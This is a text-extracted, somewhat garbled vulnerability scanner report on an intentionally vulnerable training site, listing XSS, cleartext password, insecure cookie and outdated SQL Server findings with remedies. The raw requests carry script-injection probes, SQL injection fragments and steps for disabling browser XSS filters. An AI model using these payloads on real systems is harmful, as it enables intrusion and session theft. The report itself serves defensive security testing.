ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
